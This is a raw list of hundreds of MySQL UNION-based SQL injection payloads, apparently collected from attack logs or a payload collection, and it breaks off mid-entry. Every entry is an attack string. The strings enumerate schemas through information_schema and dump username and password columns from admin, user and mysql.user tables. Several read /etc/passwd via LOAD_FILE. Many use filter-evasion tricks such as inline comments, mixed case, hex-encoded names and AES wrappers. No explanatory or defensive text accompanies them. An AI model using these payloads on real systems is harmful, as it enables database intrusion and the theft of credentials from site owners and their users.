select 1,2,3,4,5,6,7-- -54 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 -- -54 union select 1,2,3,4,5,6,7,concat_ws(0x2f,user(),version(),database())/* -54 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,26 -- -54' union select 1,2,3,4,table_name,6,7,8 from information_schema.tables -- -54 union select 1,2,3,4,version(),6,7,8 -- -54 union select 1,2,3,convert(concat_ws(0x3a,username,password),binary),5,6,7,8,9,0,1 from adminusers/* -54 union select 1,2,3,convert(concat_ws(char(58),version(),user(),database()) using latin1),5,6,7,8,9,10,11/* -54 union select 1,2,3,convert(version() using latin1),5,6,7,8,9,10,11/* -54 union select 1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5-- -54 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8/* -54 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16-- 54 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns -54 union select 1,concat(login,0x3a,pass) from users/* -54 union select 1,concat(table_name,0x3a,table_rows),3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables-- -54' union select 1,concat_ws(0x3a,username,password),3,4 from administrators/* 54 union select 1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 limit 1,1/* -54 union select concat(login,0x3a,password),2,3,4,5,6,7,8,9,10,11 from logins-- -5507 UNION SELECT 1,GROUP_CONCAT(AES_DECRYPT(AES_ENCRYPT(COLUMN_NAME,1),1)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='romcart_users'# 550 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9-- 55-1 union select 1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 -- -551 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables limit 200,1-- 55237987987987 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5-- 552 limit 0 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 552 union select 1,2,3,concat_ws(0x3a3a,login,password,name),5 from user -- -552 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables -- -55399 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FroM members /* -553 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 554 and 1=0 union select 1,2,group_concat(table_name separator 0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database() -- 5555406 union select id from admin-- 55556444444 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- 555 union select 111,concat_ws(0x3a,user(),version(),database())/* -557 union select 1,2,3,table_name,5,6 from information_schema.columns where column_name=0x70617373776f7264/* -557 union select 1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* 55809 and 1=0 union select 0,1,2,3,version(),5,6,7,8,9,10,11,12 -55886' union select 1,2,3,4,5,6,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- -558 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) -559 union select 1,2,3,4,5,version(),7,8,9,10,11-- -55/**/and/**/1=0/**//*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,group_cOnCaT(ColUmN_naMe),13,14,15,16 from information_schema.columns WHERE TabLE_NaME=0x6f7264657273 -- 55' and 1=0 union select 1,2,3,4,5,6,group_concat(table_name),8 from information_schema.tables where table_schema=database() -- 55 and 1=0 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 55' and 1=0 UnIon selECt 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() -- -55' and 1=2 union select 1,2,cast(version() as char),4,5,6 -- 55 and length(char(1))!=1 union(select 1,2,3,4,5,6,7) -55 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,version(),database(),user()) -55 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(login,char(58),password),14,15,16,17,18,19,20 from users/* -55' union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 55' union select 1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8,9,10,11/* -55 union select 1,2,3,aes_decrypt(aes_encrypt(user()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/* 55 union select 1,2,3,concat_ws(0x3a,version(),database(),user()) -55 union select 1,2,3,convert(concat_ws(0x3a,username,password),binary),5,6,7,8,9,0,1 from users/* 55 union select 1,2,3,database(),user(),6,7,8,9,10,11,12,version(),14,15,16,17 limit 1,1/* -55 union select 1,2,column_name,4,5,6 from information_schema.columns where table_name=0x7573657273 -- -55 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4-- -55 union select 1,2,concat(version(),0x3a3a,user(),0x3a3a,database()),4,5/* -55 union select 1,2,concat_ws(0x3a3a,username,password) from users /* -55 union select 1,2,group_concat(username,char(58),password,0x3c62723e),4,5,6,7,8,9 from admininfo -- -55' union select 1,2,LOAD_FILE(0x2F7573722F7777772F6273682F68746D6C2F696E6465782E706870),4,5,6,7,8,9 from mysql.user /* -55 union select 1,2,unhex(hex(concat_ws(0x203a20,version(),user(),host,user,password,file_priv))),4,5,6,7,8 from mysql.user-- 55 union select 1,concat(user_name,char(58),user_password),3,4,5,6,7,8 from users limit 0,1/* 55 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -55 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7-- 55 union select 1,user(),version(),database(),5,6 -55 union select 1,@@version,3,4,5,6,7,8,9 -- -55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users limit 0,1-- -55 union select concat(version(),0x20,database(),0x20,user())-- -55' union select concat_ws(0x3a,user(),version(),database())/* 55 union select concat_ws(0x3a,version(),database(),user()),2,3,4 limit 1,1/* -55 union select group_concat(table_name separator 0x3a) from information_schema.tables where table_schema=0x72746c74645f31-- 560 and ascii(lower(substring(user(),1,1)))=112=p 560 and (substring(version(),1,1))=5 -560 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8-- -5612 union select group_concat(table_NaME),2,3,4,5,67,8,9,1 from information_schema.tables-- -561842 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x0b,user(),version(),database()),13,14 -56321 union select convert(version() using latin1),2/* 563 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 -- -563 union select 1,2,0x3c68313e3c666f6e7420636f6c6f723d6c696d653e3a3a3a504950455a3a3a3a3c2f666f6e743e3c2f68313e,4,5/* 563 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password,email,privilege),14,15,16,17,18,19,20 from users limit 2,1-- -563' union select 1,2,table_name,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables limit 879,1000 -- 56484 and 2=1 union select 1,convert(concat(user,0x3a,password) using cp1251),3,4,5,6,7,8,9 from mysql.user/* -5649 union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17 -- -564 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68-- -565 union select 1,2,concat(login,0x20,password),4 from sm_users limit 1,1-- 565 union select concat(version(),0x3a,database(),0x3a,user()),2,3,4-- -5661union select 1, version(),3,4 -- 56634 or 1=(select system_user) -5664' UNION SELECT 1,2,concat_ws(0x203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415 -- 56688 and 1=2 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21-- 566 union select 1,2,3,4,5,6,7,concat(login,char(58),password),9 from users limit 0,1/* 5678944 UNION SELECT 1,2,concat_ws(0x3a3a,email,username,password),4,5 FROM mashup.admin_details-- -567' union select 1,2,3,4,5,user_id,7,8,9,10,11,12,13,14,15 from users -- -567 union select 1,2,3,4,concat_ws(0x3a,version(),user()),6,7,8,9,10-- -568844818 union select 1,group_concat(strLogin,char(58),strPassword,char(58),AccountType),3,4,5,6 from tblaccount-- 568-999.9 union select 1,2,3,email,password,6,7,8,9,10 from users limit 5,1-- 5694 and 5694=-1 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16/* -569 union select 1,concat(login,char(58),password,char(58),email),3 from user limit 0,1/* -569 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- 56 and 0 union select 1,2,id,login,password,6,7,8 from users -- 56 and 1=0 union select 1,2,3,4,5,6,7 from admin-- 56 and 1=0 Union Select 1,2,3,version() ,5 -56 union select 1,2,3,4444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -56 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- -56 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x2a,database(),0x2a,version()),15,16,17 -56 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,database(),version(),user()),12,13,14,15,16,17,18,19,20-- 56 UnIon selECt 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 -- -56 union select 1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12 from users/* 56 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 limit 1,1/* 56 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 limit 1,1/* -56 union select 1,2,3,4,5,unhex(hex(version())),7,8,9,10,11,12,13,14,15,16/* -56 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6-- -56 union select 1,2,3,4,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),6,7,8 -56 union select 1,2,3,concat_ws(0x3a,user(),@@version_compile_os,version()),5,6 -- -56 union select 1,2,3,user(),database(),6,7,8,9,version(),11,12,13,14,15,16/* -56 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12 -56 UNION SELECT 1,2,concat_ws(0x3,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM users/* -56 union select 1,2,group_concat(0x0b,column_name),4,5,6,7,8 from information_schema.columns where table_name=0x6262665f7573657273 56 union select 1,2,version(),concat_ws(0x3a,id,username,password),5,6,7,8,9,10,11,12 from members limit 0,1 56 union select 1,concat(unhex(hex(user())),0x3a,unhex(hex(database())),0x3a,unhex(hex(version()))),3,4,5,6,7,8,9 -- -56 union select 1,concat_ws(0x3a3a,user_name,password),3,4,5,6 from user -- -56 union select 1,concat_ws(0x3a,version(),user(),database()) -- -56 union select 1,group_concat(login,0x2a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from administrador -56 union select 1,pass,3,4,5,6,7 from user -56 UNION SELECT concat_ws(0x3a,user(),version(),database()) from users-- -56 union select concat_ws(0x3a,@@version,user(),database()) -- -56 union select concat_ws(char(58),user,password),2,3,4 from mysql.user/* 5701 UNION ALL SELECT 1,table_name,null,null,null,null,null,null,null,null,null from information_schema.tables-- 570' and 1=0 union select 1,2,3,4,5,6,concat_Ws(0x3a,users_name,password,full_name,parent_id,lang,email,create_survey,create_user,delete_user,superadmin,configurator,manage_template,manage_label,htmleditormode,one_time_pw,dateformat),8,9,10,11,12,13,14,15,16,17,18 from limesurvey.users limit 2,1 -- 570 and 1=0 UNION SELECT 1,2,3,4,5,version(),7,8 -- -5711 union select 1,2,3,4,5,6,7,8,concat(@i:=0x00,@o:=0x0d0a,benchmark(977,@o:=CONCAT(@o,0x0d0a,(SELECT@i:=concat(BenutzerID,0x3a,Benutzername,0x3a,Passwort,0x0a7c)fromus_benutzerwhereBenutzerID>@iorderbyBenutzerIDLIMIT1))),@o),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 -- -5719 UnIon selECt version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 -- 571 union select user(),database(),3,4,version(),6 -- 5722 union select 1,2,username,userpass,5,6,7,8,9,10,11 from users/* -57258 union select 1,concat(login,0x3a,password) from admin/* -5730 union select 1,2,3,version(),user(),6,7,8,9,0,11,12,13,14,15-- 573 and 1=0 UNION SELECT 1,version() -- -573 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -- -573' union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18 from mysql.user/* -573 union select 1,2,3,4,concat(nikname,0x20,nikpass,0x20,admin_ok,,0x20,admin_nikkazakhemailyes),6,7,8,9,10 FROM nik-- -573 union select 1,2,3,table_name,5 from INFORMATION_SCHEMA.TABLES limit 23,1/* -573 union select 1,2,3,version(),password,6,7,user,char(58),10 from users/* ## 57 /!*40000 and 0 */ -5746' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,17/* -574 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/* 575 and 1=0 =null Union Select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 575 union select 1,2,current_user,4,5,6 -575 union select 1,concat(user_login,char(58),user_pass) from wordpress.wp_users -- -575' union select 1,group_concat(database(),0x3a,version(),0x3a,user()) -- -577 union select 1,2,3,4,5,version(),7 -- -577 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables -- 5784-999.9 union select 1,concat(version(),database(),user()),3,4,5,6,7,8,9-- 5789798798700 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,CONCAT_ws(0x3a,id,username,password),14,15,16,17,18,19,20,21,22,23,24,25,26 FROM admin LIMIT 0,1-- -578 union select 1,2,concat_ws(0x3a3a,user_name,password,administrator),4,5,6,7,8,9,10,11,12 from users /* 578 union select 1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),3,4,5,6,7 -- -578 union select concat_ws(0x3a,user(),version(),database()) 579865404760 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12-- 5798765476 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22-- 5798798695443 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -579' union select concat_ws(0x3a,user_login,user_pass),2,3,4,5 from users -- 57 and 1=0 UnIon selECt 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16 -- 57 and 1=2 union select concat_ws(0x3a,username,password) from opros_users limit 0,1-- -57 and 1=2 union select concat_ws(char(58),@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10 -- -57 union select 0,concat_ws(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from Tb_Admin -57 union select 1,2,3,4,5,6,7,8,9,0,group_concat(column_name),2,3,4,5,6,7,8,9,0,1,2 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x76625f61646d696e6973747261746f72 -- -57 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -57 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),12,13,14,15,16,17,18,19,20,21,22 -- 57 UNION SELECT 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71) LIMIT 1,1-- -57 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 -57' union select 1,2,3,4,5,concat_ws(0x3a3a,id,nome,email,login,senha,endereco,numero),7 from download_center_login limit 4,1 -- 57 union select 1,2,3,4,5,table_name,7,8,9 from information_schema.tables -- -57 union select 1,2,3,4,concat(id,login,password),6 from users limit 0,1/* 57 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8-- -57 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -57 UNION SELECT 1,2,concat(id,0x3a,name,0x3a,pass),database(),5,user(),7,8,9,10,version() from users limit 1,1/* -57 union select 1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12 from indexbox_users-- -57 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5/* -57 union select 1,admin_id,3,4,5,6,admin_email,admin_pass,9,10,11 from zenadmin/* 57 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x536d6f747269207379756461202d2d2d3e,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 LIMIT 1,1/* -57 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3 -57 union select 1,concat_ws(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7 -57 union select 1,concat_ws(0x3a,admin_name,password),3,4,5,6,7,8,9,10,11 From administrators-- -57 union select 1,concat_ws(0x3a,login,0x3a,pass_hash),3,4,5,6,7,8 from accounts limit 0,1-- -57 union select 1,concat_ws(0x3a,version(),user -57 /*!union*/ select 1,table_name,3,4,5 from information_schema.tables-- -57 union select 1,@@version,3,4,5,6 -- 57 union select 1,version(),current_database(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- -57 UNION SELECT concat_ws(0x3a, user(), database(), version()),2/* -57' union select (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name,0x20202020207c,user(),0x3a,version(),0x3a,database()))))x) -- -5806') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database()),15,16,17,18,19,20,21,22,23,24 -- 5809780896798653 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),user(),database()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -580 union all select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8-- 5811 AND 1=2 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9/* 581 and 1=0 union select 1,2,3,concat_ws(0x3a,email,heslo),5,6,7,8 from uzivatel-- -5834 UNION SELECT 1,VERSION(),3,USER(),5,6,7,8/* 584 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users limit 0,1 -- -585 union select 1,2,3,concat_ws(0x3a,@@version_compile_os,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -585 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14 -5860 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),6,7 from users/* -5861' union select 1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9 -- 586 UNION SELECT 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 LIMIT 1,1-- 587614566876870 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- 58764687 UNION SELECT 1,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 58764687 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 587687645434687 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71)-- -587 union select 1,user(),database(),version(),5,6,7,8,9/* -588342 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user/* 5886876588 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 58869 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15 -- 588 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12 limit 1,1 58964 or 58964=(SELECT TOP 1 cast(Name as nvarchar) from Ad)-- 5898 union select 1,2,3,table_name,5,6,7,8 from information_schema.tables-- -5898 UNION SELECT 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15 FROM mysql.user/* 58-999.9 union select 1,2,3,version(),5-- 589' or 1 group by concat((select version()),floor(rand(0)*2))/*!having*/ min(0) or 1-- 589 union select 1,2,3,4,database(),group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 from information_schema.columns where table_name='users'-- 58 and 1=2 union select 1,2,3,group_concat(login,0x3a,password,0x0b),5,6,7,8,9,10,11,12,13 from admin-- 58' and 1=2 union select 1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7-- 58 union all select 1,concat_ws(0x3a,version(),user(),database())/* -58 UNION SELECT 0,1,2,3,4,5,6,concat_ws(0x0b,user(),version(),database()),8,9 -- -58 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os) ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -58 union select 1,2,3,4,5,6,USER(),VERSION(),9,10,11/* 58' UNION SELECT 1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6,7,8,9,10 LIMIT 1,1/* 58 UNION SELECT 1,2,3,4,concat(login,0x3a,pass,0x3a,email),6,7,8,9,10 FROM userdata LIMIT 1,1/* 58' union select 1,2,3,4,unhex(hex(concat_ws(0x3a,version(),user(),database()))),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -58 union select 1,2,3,concat(name,0x3a,password),icq_number,concat(ip_address,0x3a,email),7,8 from vitz_forums.ibf_members/* -58 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -58' union select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11/* -58 union select 1,2,3,login,pass,6,7,8 from users/* 58 UNION SELECT 1,2,CONCAT(0x2a,Version(),0x2a,Database(),0x2a,User(),0x2a),4,5,6,7,8,9,10 LIMIT 1,1-- -58 union select 1,2,concat(login,char(58)pass),4,5,6,7,8,910,11,12 from users limit 0,1/* -58 union select 1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15 -58 union select 1,2,load_file('/etc/passwd'),4,5,6,concat_ws(0x2a,user(),version(),database()),8,9,10,11,12,13-- -58 union select 1,2,table_name,4 from information_schema.tables -- -58 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8 from information_schema.tables-- -58 union select 1,concat_ws(0x3a3a,login,pass) from users /* -58' union select 1,concat_ws(0x3a,id,login,pass),3,4,5,6,7 from cat_adm -- -58 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7-- -58' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15 -58' union select 1,count(*),3,4,5,6,7 from cat_users -- -58' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='cat_users' -- -58 union select 1,version(),3,user(),database()/* 58 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11-- -58 union select concat_ws(0x3a,username,user_password),2,3,4,5,6 from forum_users/* -58 union select group_concat(0x0b,TABLE_NAME) from information_schema.tables-- 590' union select 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9,10,11,12/* 591 limit 0 UNION SELECT CONCAT(id,username,password) FROM alpha.divas LIMIT 1,1-- 591 union select concat_ws(0x3a,version(),database(),user()) limit 1,1-- -59221 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 -- 592 union select 